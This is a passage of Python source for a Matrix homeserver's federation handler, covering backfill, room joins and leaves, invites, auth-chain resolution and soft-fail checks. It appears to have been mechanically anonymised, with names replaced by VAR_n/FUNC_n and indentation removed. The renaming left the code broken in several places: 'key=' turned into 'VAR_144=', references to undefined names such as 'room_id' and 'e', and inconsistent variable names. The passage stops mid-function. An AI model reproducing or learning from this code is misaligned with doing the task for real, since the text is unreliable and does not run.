VAR_79 = await self.state_handler.get_current_state(VAR_11)
def FUNC_46(VAR_2):
VAR_161 = [
(state_key, int(VAR_1.depth))
for (e_type, state_key), VAR_1 in VAR_2.items()
if e_type == VAR_188.Member and VAR_1.membership == Membership.JOIN
]
VAR_162 = {} # type: Dict[str, int]
for u, d in VAR_161:
try:
VAR_196 = get_domain_from_id(u)
VAR_197 = VAR_162.get(VAR_196)
if VAR_197:
VAR_162[VAR_196] = min(d, VAR_197)
else:
VAR_162[VAR_196] = d
except Exception:
pass
return sorted(VAR_162.items(), VAR_144=lambda d: d[1])
VAR_80 = FUNC_46(VAR_79)
VAR_81 = [
domain for domain, depth in VAR_80 if domain != self.server_name
]
async def FUNC_47(VAR_82):
for VAR_196 in VAR_82:
try:
await self.backfill(
VAR_196, VAR_11, VAR_17=100, VAR_18=extremities
)
return True
except SynapseError as VAR_170:
VAR_0.info("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
continue
except HttpResponseException as VAR_170:
if 400 <= VAR_170.code < 500:
raise VAR_170.to_synapse_error()
VAR_0.info("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
continue
except CodeMessageException as VAR_170:
if 400 <= VAR_170.code < 500:
raise
VAR_0.info("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
continue
except NotRetryingDestination as VAR_170:
VAR_0.info(str(VAR_170))
continue
except RequestSendFailed as VAR_170:
VAR_0.info("Failed to get FUNC_6 from %s because %s", VAR_196, VAR_170)
continue
except FederationDeniedError as VAR_170:
VAR_0.info(VAR_170)
continue
except Exception as VAR_170:
VAR_0.exception("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
continue
return False
VAR_83 = await FUNC_47(VAR_81)
if VAR_83:
return True
VAR_84 = set(VAR_81)
VAR_84.add(self.server_name)
VAR_14 = list(VAR_18.keys())
VAR_0.debug("calling resolve_state_groups in _maybe_backfill")
VAR_85 = preserve_fn(self.state_handler.resolve_state_groups_for_events)
VAR_86 = await make_deferred_yieldable(
defer.gatherResults(
[VAR_85(VAR_11, [VAR_170]) for VAR_170 in VAR_14], consumeErrors=True
)
)
VAR_86 = dict(zip(VAR_14, [s.state for s in VAR_86]))
VAR_87 = await self.store.get_events(
[VAR_160 for ids in VAR_86.values() for VAR_160 in ids.values()],
get_prev_content=False,
)
VAR_86 = {
VAR_144: {
k: VAR_87[VAR_160]
for k, VAR_160 in state_dict.items()
if VAR_160 in VAR_87
}
for VAR_144, state_dict in VAR_86.items()
}
for VAR_160, VAR_166 in VAR_76:
VAR_81 = FUNC_46(VAR_86[VAR_160])
VAR_83 = await FUNC_47(
[VAR_196 for VAR_196, VAR_166 in VAR_81 if VAR_196 not in VAR_84]
)
if VAR_83:
return True
VAR_84.update(VAR_196 for VAR_196, VAR_166 in VAR_81)
return False
async def FUNC_8(
self, VAR_10: str, VAR_11: str, VAR_20: Iterable[str]
):
VAR_28 = await self.store.get_room_version(VAR_11)
VAR_60 = {} # type: Dict[str, EventBase]
async def FUNC_48(VAR_12: str):
with nested_logging_context(VAR_12):
try:
VAR_1 = await self.federation_client.get_pdu(
[VAR_10], VAR_12, VAR_28, outlier=True,
)
if VAR_1 is None:
VAR_0.warning(
"Server %s didn't return VAR_1 %s", VAR_10, VAR_12,
)
return
VAR_60[VAR_1.event_id] = VAR_1
except Exception as VAR_170:
VAR_0.warning(
"Error fetching VAR_37 VAR_2/VAR_89 VAR_1 %s: %s %s",
VAR_12,
type(VAR_170),
e,
)
await concurrently_execute(FUNC_48, VAR_20, 5)
VAR_3 = [
aid
for VAR_1 in VAR_60.values()
for aid in VAR_1.auth_event_ids()
if aid not in VAR_60
]
VAR_88 = await self.store.get_events(
VAR_3, allow_rejected=True,
)
VAR_34 = []
for VAR_1 in VAR_60.values():
VAR_89 = {}
for auth_event_id in VAR_1.auth_event_ids():
VAR_187 = VAR_88.get(auth_event_id) or VAR_60.get(auth_event_id)
if VAR_187:
VAR_89[(VAR_187.type, VAR_187.state_key)] = VAR_187
else:
VAR_0.info("Missing VAR_89 VAR_1 %s", auth_event_id)
VAR_34.append(CLASS_0(VAR_1, None, VAR_89))
await self._handle_new_events(
VAR_10, VAR_11, VAR_34,
)
def FUNC_9(self, VAR_21):
if len(VAR_21.prev_event_ids()) > 20:
VAR_0.warning(
"Rejecting VAR_1 %s which has %i prev_events",
VAR_21.event_id,
len(VAR_21.prev_event_ids()),
)
raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many prev_events")
if len(VAR_21.auth_event_ids()) > 10:
VAR_0.warning(
"Rejecting VAR_1 %s which has %i auth_events",
VAR_21.event_id,
len(VAR_21.auth_event_ids()),
)
raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many auth_events")
async def FUNC_10(self, VAR_22, VAR_1):
VAR_6 = await self.federation_client.send_invite(
VAR_10=VAR_22,
VAR_11=VAR_1.room_id,
VAR_12=VAR_1.event_id,
VAR_6=VAR_1,
)
return VAR_6
async def FUNC_11(self, VAR_12: str) -> List[EventBase]:
VAR_1 = await self.store.get_event(VAR_12)
VAR_89 = await self.store.get_auth_chain(
list(VAR_1.auth_event_ids()), include_given=True
)
return list(VAR_89)
async def FUNC_12(
self, VAR_23: Iterable[str], VAR_11: str, VAR_24: str, VAR_25: JsonDict
) -> Tuple[str, int]:
assert self.config.worker.worker_app is None
VAR_0.debug("Joining %s to %s", VAR_24, VAR_11)
VAR_5, VAR_1, VAR_90 = await self._make_and_verify_event(
VAR_23,
VAR_11,
VAR_24,
"join",
VAR_25,
VAR_30={"ver": KNOWN_ROOM_VERSIONS},
)
assert VAR_11 not in self.room_queues
self.room_queues[VAR_11] = []
await self._clean_room_for_join(VAR_11)
VAR_91 = set()
try:
VAR_98 = list(VAR_23)
try:
VAR_98.remove(VAR_5)
VAR_98.insert(0, VAR_5)
except ValueError:
pass
VAR_117 = await self.federation_client.send_join(
VAR_98, VAR_1, VAR_90
)
VAR_5 = VAR_117["origin"]
VAR_2 = VAR_117["state"]
VAR_63 = VAR_117["auth_chain"]
VAR_63.sort(VAR_144=lambda VAR_170: VAR_170.depth)
VAR_91.update([s.event_id for s in VAR_2])
VAR_91.update([a.event_id for a in VAR_63])
VAR_91.add(VAR_1.event_id)
VAR_0.debug("do_invite_join VAR_63: %s", VAR_63)
VAR_0.debug("do_invite_join VAR_2: %s", VAR_2)
VAR_0.debug("do_invite_join VAR_1: %s", VAR_1)
await self.store.upsert_room_on_join(
VAR_11=room_id, VAR_28=VAR_90,
)
VAR_163 = await self._persist_auth_tree(
VAR_5, VAR_11, VAR_63, VAR_2, VAR_1, VAR_90
)
await self._replication.wait_for_stream_position(
self.config.worker.events_shard_config.get_instance(VAR_11),
"events",
VAR_163,
)
VAR_164 = await self.store.get_room_predecessor(VAR_11)
if not VAR_164 or not isinstance(VAR_164.get("room_id"), str):
return VAR_1.event_id, VAR_163
VAR_165 = VAR_164["room_id"]
VAR_0.debug(
"Found VAR_164 for %s during remote join: %s", VAR_11, VAR_165
)
VAR_143 = self.hs.get_room_member_handler()
await VAR_143.transfer_room_state_on_room_upgrade(
VAR_165, VAR_11
)
VAR_0.debug("Finished joining %s to %s", VAR_24, VAR_11)
return VAR_1.event_id, VAR_163
finally:
VAR_26 = self.room_queues[VAR_11]
del self.room_queues[VAR_11]
run_in_background(self._handle_queued_pdus, VAR_26)
async def FUNC_13(self, VAR_26):
for p, VAR_5 in VAR_26:
try:
VAR_0.info(
"Processing queued PDU %s which was received "
"while we were joining %s",
p.event_id,
p.room_id,
)
with nested_logging_context(p.event_id):
await self.on_receive_pdu(VAR_5, p, VAR_7=True)
except Exception as VAR_170:
VAR_0.warning(
"Error handling queued PDU %s from %s: %s", p.event_id, VAR_5, VAR_170
)
async def FUNC_14(
self, VAR_5: str, VAR_11: str, VAR_27: str
) -> EventBase:
if get_domain_from_id(VAR_27) != VAR_5:
VAR_0.info(
"Got /make_join request for user %r from different VAR_5 %s, ignoring",
VAR_27,
VAR_5,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
VAR_28 = await self.store.get_room_version_id(VAR_11)
VAR_53 = await self.auth.check_host_in_room(VAR_11, self.server_name)
if not VAR_53:
VAR_0.info(
"Got /make_join request for room %s we are no longer in", VAR_11,
)
raise NotFoundError("Not an active room on this server")
VAR_92 = {"membership": Membership.JOIN}
VAR_93 = self.event_builder_factory.new(
VAR_28,
{
"type": VAR_188.Member,
"content": VAR_92,
"room_id": VAR_11,
"sender": VAR_27,
"state_key": VAR_27,
},
)
try:
VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
VAR_93=builder
)
except SynapseError as VAR_170:
VAR_0.warning("Failed to create join to %s because %s", VAR_11, VAR_170)
raise
await self.auth.check_from_context(
VAR_28, VAR_1, VAR_32, do_sig_check=False
)
return VAR_1
async def FUNC_15(self, VAR_5, VAR_6):
VAR_1 = VAR_6
VAR_0.debug(
"on_send_join_request from %s: Got VAR_1: %s, signatures: %s",
VAR_5,
VAR_1.event_id,
VAR_1.signatures,
)
if get_domain_from_id(VAR_1.sender) != VAR_5:
VAR_0.info(
"Got /send_join request for user %r from different VAR_5 %s",
VAR_1.sender,
VAR_5,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
VAR_1.internal_metadata.outlier = False
VAR_1.internal_metadata.send_on_behalf_of = VAR_5
VAR_32 = await self._handle_new_event(VAR_5, VAR_1)
VAR_0.debug(
"on_send_join_request: After FUNC_26: %s, sigs: %s",
VAR_1.event_id,
VAR_1.signatures,
)
VAR_94 = await VAR_32.get_prev_state_ids()
VAR_95 = list(VAR_94.values())
VAR_63 = await self.store.get_auth_chain(VAR_95)
VAR_2 = await self.store.get_events(list(VAR_94.values()))
return {"state": list(VAR_2.values()), "auth_chain": VAR_63}
async def FUNC_16(
self, VAR_5: str, VAR_1: EventBase, VAR_28: RoomVersion
):
if VAR_1.state_key is None:
raise SynapseError(400, "The invite VAR_1 did not have a VAR_2 key")
VAR_96 = await self.store.is_room_blocked(VAR_1.room_id)
if VAR_96:
raise SynapseError(403, "This room has been blocked on this server")
if self.hs.config.block_non_admin_invites:
raise SynapseError(403, "This server does not accept room invites")
if not self.spam_checker.user_may_invite(
VAR_1.sender, VAR_1.state_key, VAR_1.room_id
):
raise SynapseError(
403, "This user is not permitted to send invites to this server/user"
)
VAR_29 = VAR_1.content.get("membership")
if VAR_1.type != VAR_188.Member or VAR_29 != Membership.INVITE:
raise SynapseError(400, "The VAR_1 was not an m.room.member invite event")
VAR_97 = get_domain_from_id(VAR_1.sender)
if VAR_97 != VAR_5:
raise SynapseError(
400, "The invite VAR_1 was not from the server sending it"
)
if not self.is_mine_id(VAR_1.state_key):
raise SynapseError(400, "The invite VAR_1 must be for this server")
if VAR_1.state_key == self._server_notices_mxid:
raise SynapseError(HTTPStatus.FORBIDDEN, "Cannot invite this user")
await self._maybe_store_room_on_outlier_membership(
VAR_11=VAR_1.room_id, VAR_28=room_version
)
VAR_1.internal_metadata.outlier = True
VAR_1.internal_metadata.out_of_band_membership = True
VAR_1.signatures.update(
compute_event_signature(
VAR_28,
VAR_1.get_pdu_json(),
self.hs.hostname,
self.hs.signing_key,
)
)
VAR_32 = await self.state_handler.compute_event_context(VAR_1)
await self.persist_events_and_notify(VAR_1.room_id, [(VAR_1, VAR_32)])
return VAR_1
async def FUNC_17(
self, VAR_23: Iterable[str], VAR_11: str, VAR_27: str, VAR_25: JsonDict
) -> Tuple[EventBase, int]:
VAR_5, VAR_1, VAR_28 = await self._make_and_verify_event(
VAR_23, VAR_11, VAR_27, "leave", VAR_25=content
)
VAR_1.internal_metadata.outlier = True
VAR_1.internal_metadata.out_of_band_membership = True
VAR_98 = list(VAR_23)
try:
VAR_98.remove(VAR_5)
VAR_98.insert(0, VAR_5)
except ValueError:
pass
await self.federation_client.send_leave(VAR_98, VAR_1)
VAR_32 = await self.state_handler.compute_event_context(VAR_1)
VAR_99 = await self.persist_events_and_notify(
VAR_1.room_id, [(VAR_1, VAR_32)]
)
return VAR_1, VAR_99
async def FUNC_18(
self,
VAR_23: Iterable[str],
VAR_11: str,
VAR_27: str,
VAR_29: str,
VAR_25: JsonDict = {},
VAR_30: Optional[Dict[str, Union[str, Iterable[str]]]] = None,
) -> Tuple[str, EventBase, RoomVersion]:
(
VAR_5,
VAR_1,
VAR_28,
) = await self.federation_client.make_membership_event(
VAR_23, VAR_11, VAR_27, VAR_29, VAR_25, VAR_30=params
)
VAR_0.debug("Got VAR_183 to make_%s: %s", VAR_29, VAR_1)
assert VAR_1.type == VAR_188.Member
assert VAR_1.user_id == VAR_27
assert VAR_1.state_key == VAR_27
assert VAR_1.room_id == VAR_11
return VAR_5, VAR_1, VAR_28
async def FUNC_19(
self, VAR_5: str, VAR_11: str, VAR_27: str
) -> EventBase:
if get_domain_from_id(VAR_27) != VAR_5:
VAR_0.info(
"Got /make_leave request for user %r from different VAR_5 %s, ignoring",
VAR_27,
VAR_5,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
VAR_28 = await self.store.get_room_version_id(VAR_11)
VAR_93 = self.event_builder_factory.new(
VAR_28,
{
"type": VAR_188.Member,
"content": {"membership": Membership.LEAVE},
"room_id": VAR_11,
"sender": VAR_27,
"state_key": VAR_27,
},
)
VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
VAR_93=builder
)
try:
await self.auth.check_from_context(
VAR_28, VAR_1, VAR_32, do_sig_check=False
)
except AuthError as VAR_170:
VAR_0.warning("Failed to create new leave %r because %s", VAR_1, VAR_170)
raise VAR_170
return VAR_1
async def FUNC_20(self, VAR_5, VAR_6):
VAR_1 = VAR_6
VAR_0.debug(
"on_send_leave_request: Got VAR_1: %s, signatures: %s",
VAR_1.event_id,
VAR_1.signatures,
)
if get_domain_from_id(VAR_1.sender) != VAR_5:
VAR_0.info(
"Got /send_leave request for user %r from different VAR_5 %s",
VAR_1.sender,
VAR_5,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
VAR_1.internal_metadata.outlier = False
await self._handle_new_event(VAR_5, VAR_1)
VAR_0.debug(
"on_send_leave_request: After FUNC_26: %s, sigs: %s",
VAR_1.event_id,
VAR_1.signatures,
)
return None
async def FUNC_21(self, VAR_11: str, VAR_12: str) -> List[EventBase]:
VAR_1 = await self.store.get_event(VAR_12, check_room_id=VAR_11)
VAR_100 = await self.state_store.get_state_groups(VAR_11, [VAR_12])
if VAR_100:
VAR_166, VAR_2 = list(VAR_100.items()).pop()
VAR_167 = {(VAR_170.type, VAR_170.state_key): VAR_170 for VAR_170 in VAR_2}
if VAR_1.is_state():
if "replaces_state" in VAR_1.unsigned:
VAR_198 = VAR_1.unsigned["replaces_state"]
if VAR_198 != VAR_1.event_id:
VAR_200 = await self.store.get_event(VAR_198)
VAR_167[(VAR_1.type, VAR_1.state_key)] = VAR_200
else:
del VAR_167[(VAR_1.type, VAR_1.state_key)]
VAR_168 = list(VAR_167.values())
return VAR_168
else:
return []
async def FUNC_22(self, VAR_11: str, VAR_12: str) -> List[str]:
VAR_1 = await self.store.get_event(VAR_12, check_room_id=VAR_11)
VAR_100 = await self.state_store.get_state_groups_ids(VAR_11, [VAR_12])
if VAR_100:
VAR_166, VAR_2 = list(VAR_100.items()).pop()
VAR_167 = VAR_2
if VAR_1.is_state():
if "replaces_state" in VAR_1.unsigned:
VAR_198 = VAR_1.unsigned["replaces_state"]
if VAR_198 != VAR_1.event_id:
VAR_167[(VAR_1.type, VAR_1.state_key)] = VAR_198
else:
VAR_167.pop((VAR_1.type, VAR_1.state_key), None)
return list(VAR_167.values())
else:
return []
@log_function
async def FUNC_23(
self, VAR_5: str, VAR_11: str, VAR_31: List[str], VAR_17: int
) -> List[EventBase]:
VAR_101 = await self.auth.check_host_in_room(VAR_11, VAR_5)
if not VAR_101:
raise AuthError(403, "Host not in room.")
VAR_17 = min(VAR_17, 100)
VAR_20 = await self.store.get_backfill_events(VAR_11, VAR_31, VAR_17)
VAR_20 = await filter_events_for_server(self.storage, VAR_5, VAR_20)
return VAR_20
@log_function
async def FUNC_24(
self, VAR_5: str, VAR_12: str
) -> Optional[EventBase]:
VAR_1 = await self.store.get_event(
VAR_12, allow_none=True, allow_rejected=True
)
if VAR_1:
VAR_101 = await self.auth.check_host_in_room(VAR_1.room_id, VAR_5)
if not VAR_101:
raise AuthError(403, "Host not in room.")
VAR_20 = await filter_events_for_server(self.storage, VAR_5, [VAR_1])
VAR_1 = VAR_20[0]
return VAR_1
else:
return None
async def FUNC_25(self, VAR_32):
return await self.store.get_min_depth(VAR_32)
async def FUNC_26(
self, VAR_5, VAR_1, VAR_2=None, VAR_3=None, VAR_33=False
):
VAR_32 = await self._prep_event(
VAR_5, VAR_1, VAR_2=state, VAR_3=auth_events, VAR_33=backfilled
)
try:
if (
not VAR_1.internal_metadata.is_outlier()
and not VAR_33
and not VAR_32.rejected
):
await self.action_generator.handle_push_actions_for_event(
VAR_1, VAR_32
)
await self.persist_events_and_notify(
VAR_1.room_id, [(VAR_1, VAR_32)], VAR_33=backfilled
)
except Exception:
run_in_background(
self.store.remove_push_actions_from_staging, VAR_1.event_id
)
raise
return VAR_32
async def FUNC_27(
self,
VAR_5: str,
VAR_11: str,
VAR_34: Iterable[CLASS_0],
VAR_33: bool = False,
) -> None:
async def FUNC_49(VAR_102: CLASS_0):
VAR_1 = VAR_102.event
with nested_logging_context(suffix=VAR_1.event_id):
VAR_168 = await self._prep_event(
VAR_5,
VAR_1,
VAR_2=VAR_102.state,
VAR_3=VAR_102.auth_events,
VAR_33=backfilled,
)
return VAR_168
VAR_103 = await make_deferred_yieldable(
defer.gatherResults(
[run_in_background(FUNC_49, VAR_102) for VAR_102 in VAR_34],
consumeErrors=True,
)
)
await self.persist_events_and_notify(
VAR_11,
[
(VAR_102.event, VAR_32)
for VAR_102, VAR_32 in zip(VAR_34, VAR_103)
],
VAR_33=backfilled,
)
async def FUNC_28(
self,
VAR_5: str,
VAR_11: str,
VAR_3: List[EventBase],
VAR_2: List[EventBase],
VAR_1: EventBase,
VAR_28: RoomVersion,
) -> int:
VAR_104 = {}
for VAR_170 in itertools.chain(VAR_3, VAR_2):
VAR_170.internal_metadata.outlier = True
VAR_169 = await self.state_handler.compute_event_context(VAR_170)
VAR_104[VAR_170.event_id] = VAR_169
VAR_60 = {
VAR_170.event_id: VAR_170 for VAR_170 in itertools.chain(VAR_3, VAR_2, [VAR_1])
}
VAR_105 = None
for VAR_170 in VAR_3:
if (VAR_170.type, VAR_170.state_key) == (VAR_188.Create, ""):
VAR_105 = VAR_170
break
if VAR_105 is None:
raise SynapseError(400, "No create VAR_1 in state")
VAR_106 = VAR_105.content.get(
"room_version", RoomVersions.V1.identifier
)
if VAR_28.identifier != VAR_106:
raise SynapseError(400, "Room version mismatch")
VAR_107 = set()
for VAR_170 in itertools.chain(VAR_3, VAR_2, [VAR_1]):
for VAR_160 in VAR_170.auth_event_ids():
if VAR_160 not in VAR_60:
VAR_107.add(VAR_160)
for VAR_160 in VAR_107:
VAR_171 = await self.federation_client.get_pdu(
[VAR_5], VAR_160, VAR_28=room_version, outlier=True, timeout=10000,
)
if VAR_171 and VAR_171.event_id == VAR_160:
VAR_60[VAR_160] = VAR_171
else:
VAR_0.info("Failed to find VAR_89 VAR_1 %r", VAR_160)
for VAR_170 in itertools.chain(VAR_3, VAR_2, [VAR_1]):
VAR_172 = {
(VAR_60[VAR_160].type, VAR_60[VAR_160].state_key): VAR_60[VAR_160]
for VAR_160 in VAR_170.auth_event_ids()
if VAR_160 in VAR_60
}
if VAR_105:
VAR_172[(VAR_188.Create, "")] = VAR_105
try:
event_auth.check(VAR_28, VAR_170, VAR_3=VAR_172)
except SynapseError as err:
VAR_0.warning("Rejecting %s because %s", VAR_170.event_id, err.msg)
if VAR_170 == VAR_1:
raise
VAR_104[VAR_170.event_id].rejected = RejectedReason.AUTH_ERROR
await self.persist_events_and_notify(
VAR_11,
[
(VAR_170, VAR_104[VAR_170.event_id])
for VAR_170 in itertools.chain(VAR_3, VAR_2)
],
)
VAR_108 = await self.state_handler.compute_event_context(
VAR_1, old_state=VAR_2
)
return await self.persist_events_and_notify(
VAR_11, [(VAR_1, VAR_108)]
)
async def FUNC_29(
self,
VAR_5: str,
VAR_1: EventBase,
VAR_2: Optional[Iterable[EventBase]],
VAR_3: Optional[MutableStateMap[EventBase]],
VAR_33: bool,
) -> EventContext:
VAR_32 = await self.state_handler.compute_event_context(VAR_1, old_state=VAR_2)
if not VAR_3:
VAR_94 = await VAR_32.get_prev_state_ids()
VAR_173 = self.auth.compute_auth_events(
VAR_1, VAR_94, for_verification=True
)
VAR_174 = await self.store.get_events(VAR_173)
VAR_3 = {(VAR_170.type, VAR_170.state_key): VAR_170 for VAR_170 in VAR_174.values()}
if VAR_1.type == VAR_188.Member and not VAR_1.auth_event_ids():
if len(VAR_1.prev_event_ids()) == 1 and VAR_1.depth < 5:
VAR_189 = await self.store.get_event(
VAR_1.prev_event_ids()[0], allow_none=True
)
if VAR_189 and VAR_189.type == VAR_188.Create:
VAR_3[(VAR_189.type, VAR_189.state_key)] = VAR_189
VAR_32 = await self.do_auth(VAR_5, VAR_1, VAR_32, VAR_3=auth_events)
if not VAR_32.rejected:
await self._check_for_soft_fail(VAR_1, VAR_2, VAR_33)
if VAR_1.type == VAR_188.GuestAccess and not VAR_32.rejected:
await self.maybe_kick_guest_users(VAR_1)
return VAR_32
async def FUNC_30(
self, VAR_1: EventBase, VAR_2: Optional[Iterable[EventBase]], VAR_33: bool
) -> None:
if VAR_33 or VAR_1.internal_metadata.is_outlier():
return
VAR_109 = await self.store.get_latest_event_ids_in_room(VAR_1.room_id)
VAR_110 = set(VAR_109)
VAR_111 = set(VAR_1.prev_event_ids())
if VAR_110 == VAR_111:
return
VAR_28 = await self.store.get_room_version_id(VAR_1.room_id)
VAR_90 = KNOWN_ROOM_VERSIONS[VAR_28]
if VAR_2 is not None:
VAR_175 = await self.state_store.get_state_groups(
VAR_1.room_id, VAR_110
)
VAR_176 = list(VAR_175.values()) # type: List[Iterable[EventBase]]
VAR_176.append(VAR_2)
VAR_177 = await self.state_handler.resolve_events(
VAR_28, VAR_176, VAR_1
)
VAR_126 = {
k: VAR_170.event_id for k, VAR_170 in VAR_177.items()
} # type: StateMap[str]
else:
VAR_126 = await self.state_handler.get_current_state_ids(
VAR_1.room_id, latest_event_ids=VAR_110
)
VAR_0.debug(
"Doing soft-fail check for %s: VAR_2 %s", VAR_1.event_id, VAR_126,
)
VAR_112 = auth_types_for_event(VAR_1)
VAR_113 = [
VAR_170 for k, VAR_170 in VAR_126.items() if k in VAR_112
]
VAR_114 = await self.store.get_events(VAR_113)
VAR_115 = {
(VAR_170.type, VAR_170.state_key): VAR_170 for VAR_170 in VAR_114.values()
}
try:
event_auth.check(VAR_90, VAR_1, VAR_3=VAR_115)
except AuthError as VAR_170:
VAR_0.warning("Soft-failing %r because %s", VAR_1, VAR_170)
VAR_1.internal_metadata.soft_failed = True
async def FUNC_31(
self, VAR_5, VAR_12, VAR_11, VAR_35, VAR_36, VAR_37
):
VAR_101 = await self.auth.check_host_in_room(VAR_11, VAR_5)
if not VAR_101:
raise AuthError(403, "Host not in room.")
VAR_1 = await self.store.get_event(VAR_12, check_room_id=VAR_11)
for VAR_170 in VAR_35:
try:
await self._handle_new_event(VAR_5, VAR_170)
except AuthError:
pass
VAR_116 = await self.store.get_auth_chain(
list(VAR_1.auth_event_ids()), include_given=True
)
VAR_117 = await self.construct_auth_difference(VAR_116, VAR_35)
VAR_0.debug("on_query_auth returning: %s", VAR_117)
return VAR_117
async def FUNC_32(
self, VAR_5, VAR_11, VAR_38, VAR_39, VAR_17
):
VAR_101 = await self.auth.check_host_in_room(VAR_11, VAR_5)
if not VAR_101:
raise AuthError(403, "Host not in room.")
VAR_17 = min(VAR_17, 20)
VAR_65 = await self.store.get_missing_events(
VAR_11=room_id,
VAR_38=earliest_events,
VAR_39=latest_events,
VAR_17=limit,
)
VAR_65 = await filter_events_for_server(
self.storage, VAR_5, VAR_65
)
return VAR_65
async def FUNC_33(
self,
VAR_5: str,
VAR_1: EventBase,
VAR_32: EventContext,
VAR_3: MutableStateMap[EventBase],
) -> EventContext:
VAR_28 = await self.store.get_room_version_id(VAR_1.room_id)
VAR_90 = KNOWN_ROOM_VERSIONS[VAR_28]
try:
VAR_32 = await self._update_auth_events_and_context_for_auth(
VAR_5, VAR_1, VAR_32, VAR_3
)
except Exception:
VAR_0.exception(
"Failed to double check VAR_89 VAR_20 for %s with remote. "
"Ignoring failure and continuing processing of VAR_1.",
VAR_1.event_id,
)
try:
event_auth.check(VAR_90, VAR_1, VAR_3=auth_events)
except AuthError as VAR_170:
VAR_0.warning("Failed VAR_89 resolution for %r because %s", VAR_1, VAR_170)
VAR_32.rejected = RejectedReason.AUTH_ERROR
return VAR_32
async def FUNC_34(
self,
VAR_5: str,
VAR_1: EventBase,
VAR_32: EventContext,
VAR_3: MutableStateMap[EventBase],
) -> EventContext:
VAR_118 = set(VAR_1.auth_event_ids())
VAR_119 = VAR_118.difference(
VAR_170.event_id for VAR_170 in VAR_3.values()
)
if VAR_119:
VAR_178 = await self.store.have_seen_events(VAR_119)
VAR_0.debug("Events %s are in the store", VAR_178)
VAR_119.difference_update(VAR_178)
if VAR_119:
VAR_0.info("auth_events contains unknown VAR_20: %s", VAR_119)
try:
try:
VAR_35 = await self.federation_client.get_event_auth(
VAR_5, VAR_1.room_id, VAR_1.event_id
)
except RequestSendFailed as e1:
VAR_0.info("Failed to get VAR_1 VAR_89 from remote: %s", e1)
return VAR_32
VAR_190 = await self.store.have_seen_events(
[VAR_170.event_id for VAR_170 in VAR_35]
)
for VAR_170 in VAR_35:
if VAR_170.event_id in VAR_190:
continue
if VAR_170.event_id == VAR_1.event_id:
continue
try:
VAR_201 = VAR_170.auth_event_ids()
VAR_89 = {
(VAR_170.type, VAR_170.state_key): VAR_170
for VAR_170 in VAR_35
if VAR_170.event_id in VAR_201 or VAR_170.type == VAR_188.Create
}
VAR_170.internal_metadata.outlier = True
VAR_0.debug(
"do_auth %s VAR_119: %s", VAR_1.event_id, VAR_170.event_id
)
await self._handle_new_event(VAR_5, VAR_170, VAR_3=VAR_89)
if VAR_170.event_id in VAR_118:
VAR_3[(VAR_170.type, VAR_170.state_key)] = VAR_170
except AuthError:
pass
except Exception:
VAR_0.exception("Failed to get VAR_89 chain")
if VAR_1.internal_metadata.is_outlier():
VAR_0.info("Skipping auth_event fetch for outlier")
return VAR_32
VAR_120 = VAR_118.difference(
VAR_170.event_id for VAR_170 in VAR_3.values()
)
if not VAR_120:
return VAR_32
VAR_0.info(
"auth_events refers to VAR_20 which are not in our calculated VAR_89 "
"chain: %s",
VAR_120,
)
VAR_121 = await self.store.get_events_as_list(VAR_120)
for d in VAR_121:
if d.room_id != VAR_1.room_id:
VAR_0.warning(
"Event %s refers to auth_event %s which is in a different room",
VAR_1.event_id,
d.event_id,
)
return VAR_32
VAR_122 = VAR_3.values()
VAR_123 = dict(VAR_3)
VAR_123.update({(d.type, d.state_key): d for d in VAR_121})
VAR_62 = VAR_123.values()
VAR_28 = await self.store.get_room_version_id(VAR_1.room_id)
VAR_124 = await self.state_handler.resolve_events(
VAR_28, (VAR_122, VAR_62), VAR_1
)
VAR_0.info(
"After VAR_2 VAR_168: updating VAR_3 with new VAR_2 %s",
{
(d.type, d.state_key): d.event_id
for d in VAR_124.values()
if VAR_3.get((d.type, d.state_key)) != d
},
)
VAR_3.update(VAR_124)
VAR_32 = await self._update_context_for_auth_events(
VAR_1, VAR_32, VAR_3
)
return VAR_32
async def FUNC_35(
self, VAR_1: EventBase, VAR_32: EventContext, VAR_3: StateMap[EventBase]
) -> EventContext:
if VAR_1.is_state():
VAR_179 = (VAR_1.type, VAR_1.state_key) # type: Optional[Tuple[str, str]]
else:
VAR_179 = None
VAR_125 = {
k: a.event_id for k, a in VAR_3.items() if k != VAR_179
}
VAR_126 = await VAR_32.get_current_state_ids()
VAR_126 = dict(VAR_126) # type: ignore
VAR_126.update(VAR_125)
VAR_94 = await VAR_32.get_prev_state_ids()
VAR_94 = dict(VAR_94)
prev_state_ids.update({k: a.event_id for k, a in VAR_3.items()})
VAR_127 = VAR_32.state_group
VAR_128 = await self.state_store.store_state_group(
VAR_1.event_id,
VAR_1.room_id,
VAR_127=prev_group,
delta_ids=VAR_125,
VAR_126=current_state_ids,
)
return EventContext.with_state(
VAR_128=state_group,
state_group_before_event=VAR_32.state_group_before_event,
VAR_126=current_state_ids,
VAR_94=prev_state_ids,
VAR_127=prev_group,
delta_ids=VAR_125,
)
async def FUNC_36(
self, VAR_40: Iterable[EventBase], VAR_41: Iterable[EventBase]
) -> Dict:
VAR_0.debug("construct_auth_difference Start!")
def FUNC_50(VAR_21):
return VAR_21.depth, VAR_21.event_id
VAR_0.debug("construct_auth_difference after FUNC_50!")
VAR_129 = list(VAR_41)
VAR_129.sort(VAR_144=FUNC_50)
VAR_130 = list(VAR_40)
VAR_130.sort(VAR_144=FUNC_50)
VAR_131 = iter(VAR_130)
VAR_132 = iter(VAR_129)
VAR_0.debug("construct_auth_difference before FUNC_51!")
def FUNC_51(VAR_133, VAR_134=None):
try:
return next(VAR_133)
except Exception:
return VAR_134
VAR_135 = FUNC_51(VAR_131)
VAR_136 = FUNC_51(VAR_132)
VAR_0.debug("construct_auth_difference before while")
VAR_137 = []
VAR_138 = []
while VAR_135 or VAR_136:
if VAR_136 is None:
VAR_138.append(VAR_135)
VAR_135 = FUNC_51(VAR_131)
continue
if VAR_135 is None:
VAR_137.append(VAR_136)
VAR_136 = FUNC_51(VAR_132)
continue
if VAR_135.event_id == VAR_136.event_id:
